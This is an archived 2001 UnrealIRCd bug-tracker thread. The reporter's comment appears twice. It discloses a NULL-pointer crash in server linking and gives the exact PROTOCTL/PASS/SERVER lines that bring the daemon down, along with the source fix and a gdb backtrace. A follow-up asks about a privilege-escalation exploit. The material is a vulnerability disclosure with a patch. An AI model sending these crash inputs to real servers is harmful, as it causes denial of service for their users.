UnrealIRCd / Bugs / #47 IRCop Privilegies

Krissada Jindanupajit - 2001-04-28

Logged In: YES
user_id=201895

Hi,

I found exploit in UnrealIRCD while I am coding my own
services server. I attach my code that can down Unreal3.1.1-
Dark.... (Tested on FreeBSD 4.0)

To use my code you have to add C/N line.

[IRC Server 192.168.100.1 irc.lan]
% pico ircd.conf
..add C/N line for 192.168.100.100
% ./rehash

Unreal IRCD exploit!
Version Unreal3.1.1-Dark...
------------------------------------------------------------------------

Result:
(Core Dump)

Description:
If your machine has C/N line on the TARGET machine,
you can down TARGET withlout link password. Just send the
empty password to TARGET.

PROTOCTL TOKEN
PASS :
SERVER myserver.myhost.com 1 :NetName

Note: --TO TEST THIS --
1. Some (almost) Telnet client send \r\n. You have to write
your own client to test it!
2. You must have C/N line on remote machine and provide
correct SERVER name!

------------------------------------------------------------------------
Correction:

s_serv.c:int m_server(cptr, sptr, parc, parv)

___________________________________________________
/*Origional*/
...
...
encr = "";
#else
encr = cptr->passwd;
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd && !StrEq(aconf->passwd,
encr))
{
___________________________________________________
/* Fixed */
...
...
encr = "";
#else
/* Bug fixed by JUStice!krissada@citizen.in.th */
if (cptr->passwd) encr = cptr->passwd;
else encr = "";
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd && !StrEq(aconf->passwd,
encr))
{
...
...
___________________________________________________
Note:
encr->passwd refer to NULL pointer.

Core was generated by `ircd'.
Program terminated with signal 3, Quit.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
(gdb) bt
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
#1 0x805f370 in s_segv () at ircd.c:302
#2 0xbfbfffac in ?? ()
#3 0x80622d1 in parse (cptr=0x814e800,
buffer=0x814e8dc "SERVER", bufend=0x814e8ff "",
mptr=0x80a4c44) at parse.c:480
#4 0x8061bc3 in dopacket (cptr=0x814e800,
buffer=0x8115360 "SERVER services.thai.com
1 :ThaiNeT\r\n", length=37)
at packet.c:121
#5 0x8065fc8 in read_packet (cptr=0x814e800,
rfd=0xbfbffab4) at s_bsd.c:1655
#6 0x806683c in read_message (delay=2, listp=0x8123620)
at s_bsd.c:2184
#7 0x80609ca in main (argc=1, argv=0xbfbffc08) at
ircd.c:1372

(FreeBSD 4.0-RELEASE i386)
___________________________________________________

JUStice!krissada@citizen.in.th
Thai IRC Network (ThaiNeT)
irc://irc.thai.com

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Krissada Jindanupajit - 2001-04-28

Logged In: YES
user_id=201895

Hi,

I found exploit in UnrealIRCD while I am coding my own
services server. I attach my code that can down Unreal3.1.1-
Dark.... (Tested on FreeBSD 4.0)

To use my code you have to add C/N line.

[IRC Server 192.168.100.1 irc.lan]
% pico ircd.conf
..add C/N line for 192.168.100.100
% ./rehash

Unreal IRCD exploit!
Version Unreal3.1.1-Dark...
------------------------------------------------------------------------

Result:
(Core Dump)

Description:
If your machine has C/N line on the TARGET machine,
you can down TARGET withlout link password. Just send the
empty password to TARGET.

PROTOCTL TOKEN
PASS :
SERVER myserver.myhost.com 1 :NetName

Note: --TO TEST THIS --
1. Some (almost) Telnet client send \r\n. You have to write
your own client to test it!
2. You must have C/N line on remote machine and provide
correct SERVER name!

------------------------------------------------------------------------
Correction:

s_serv.c:int m_server(cptr, sptr, parc, parv)

___________________________________________________
/*Origional*/
...
...
encr = "";
#else
encr = cptr->passwd;
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd && !StrEq(aconf->passwd,
encr))
{
___________________________________________________
/* Fixed */
...
...
encr = "";
#else
/* Bug fixed by JUStice!krissada@citizen.in.th */
if (cptr->passwd) encr = cptr->passwd;
else encr = "";
#endif /* CRYPT_LINK_PASSWORD */
if (*aconf->passwd && !StrEq(aconf->passwd,
encr))
{
...
...
___________________________________________________
Note:
encr->passwd refer to NULL pointer.

Core was generated by `ircd'.
Program terminated with signal 3, Quit.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
(gdb) bt
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
#1 0x805f370 in s_segv () at ircd.c:302
#2 0xbfbfffac in ?? ()
#3 0x80622d1 in parse (cptr=0x814e800,
buffer=0x814e8dc "SERVER", bufend=0x814e8ff "",
mptr=0x80a4c44) at parse.c:480
#4 0x8061bc3 in dopacket (cptr=0x814e800,
buffer=0x8115360 "SERVER services.thai.com
1 :ThaiNeT\r\n", length=37)
at packet.c:121
#5 0x8065fc8 in read_packet (cptr=0x814e800,
rfd=0xbfbffab4) at s_bsd.c:1655
#6 0x806683c in read_message (delay=2, listp=0x8123620)
at s_bsd.c:2184
#7 0x80609ca in main (argc=1, argv=0xbfbffc08) at
ircd.c:1372

(FreeBSD 4.0-RELEASE i386)
___________________________________________________

JUStice!krissada@citizen.in.th
Thai IRC Network (ThaiNeT)
irc://irc.thai.com

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Gustavo Pereira - 2002-01-05

Logged In: YES
user_id=418994

Did you known something about and exploit who use something
like 0x8070cb0 0x8084600 0x8095c28 this hex codes; who give
any user IRCOP Privileges, and get also the SU ACCESS from
the IRC Services... Any ?

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

IRCop Privilegies

Group

Searches

Help

#47 IRCop Privilegies

Discussion